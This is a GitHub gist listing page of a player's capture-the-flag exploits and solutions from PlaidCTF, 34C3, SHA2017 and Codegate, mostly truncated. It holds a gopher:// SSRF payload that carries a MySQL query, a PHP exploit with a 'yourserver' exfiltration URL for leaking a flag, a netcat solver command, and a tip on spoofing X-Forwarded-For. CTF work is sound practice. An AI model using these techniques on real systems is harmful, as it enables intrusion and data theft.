Skip to content

Instantly share code, notes, and snippets.

Avatar

Edgar Boda-Majer eboda

View GitHub Profile
@eboda
eboda / exploit.js
Last active Sep 15, 2019
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
View exploit.js
////////////////////////////////////////////////////////////////////////////
//
// The vulnerability was that the following line of code could change the type of the
// underlying Array from JavascriptNativeIntArray to JavascriptArray:
//
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE;
//
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken:
// else
@eboda
eboda / doit
Last active Jun 13, 2018
34C3 CTF minbashmaxfun exploit
View doit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
@eboda
eboda / foo
Created Dec 29, 2017
34C3 CTF extract0r solution
View foo
gopher://foo@[cafebabe.cf]@yolo.com:3306/A%48%00%00%01%85%a6%3f%20%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%34%73%74%33%72%5f%6f%76%33%72%6c%30%72%64%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%00%4c%01%00%00%03%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%30%78%35%30%34%62%30%33%30%34%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%66%36%36%36%63%36%31%36%37%20%61%73%20%62%69%6e%61%72%79%29%2c%20%72%70%61%64%28%66%6c%61%67%2c%20%31%30%30%2c%20%27%41%27%29%2c%20%63%61%73%74%28%30%78%35%30%34%62%30%31%30%32%31%65%30%33%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%
@eboda
eboda / exploit.php
Last active Dec 29, 2017
34C3 CTF urlstorage exploit
View exploit.php
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
$res = '';
for ($i = 0; $i < strlen($s); $i++) {
$res .= '\\' . dechex(ord($s[$i]));
}
@eboda
eboda / go.py
Created Dec 29, 2016
hohoho solution
View go.py
import sys
m = {
'0' : '$[$?/$$]',
'1' : '$?',
'2' : '$[$?+$?]',
'3' : '$[$?+$?+$?]',
'4' : '$[$?+$?+$?+$?]',
'5' : '$[$?+$?+$?+$?+$?]',
'6' : '$[($?+$?+$?)*($?+$?)]',
@eboda
eboda / sha2017.md
Created Jun 11, 2017
SHA2017 web100 writeup
View sha2017.md

SHA2017 web100

Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For header to an IP from the required country. A list of country to IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doinng it 12 times, it would return the flag

@eboda
eboda / pwn.py
Last active Jun 11, 2017
SHA2017 crypto writeup
View pwn.py
import requests
from PIL import Image
from StringIO import StringIO
def get_flag_rgb():
rgb = []
flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content
for i in range(20, 480, 40):
rgb.append(pixel(flag, i))
View ropbaby.py
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
View template.py
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / exploit.py
Created Mar 17, 2015
codegate ctf BOOKSTORE exploit
View exploit.py
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
print "=== local exploit"
You can’t perform that action at this time.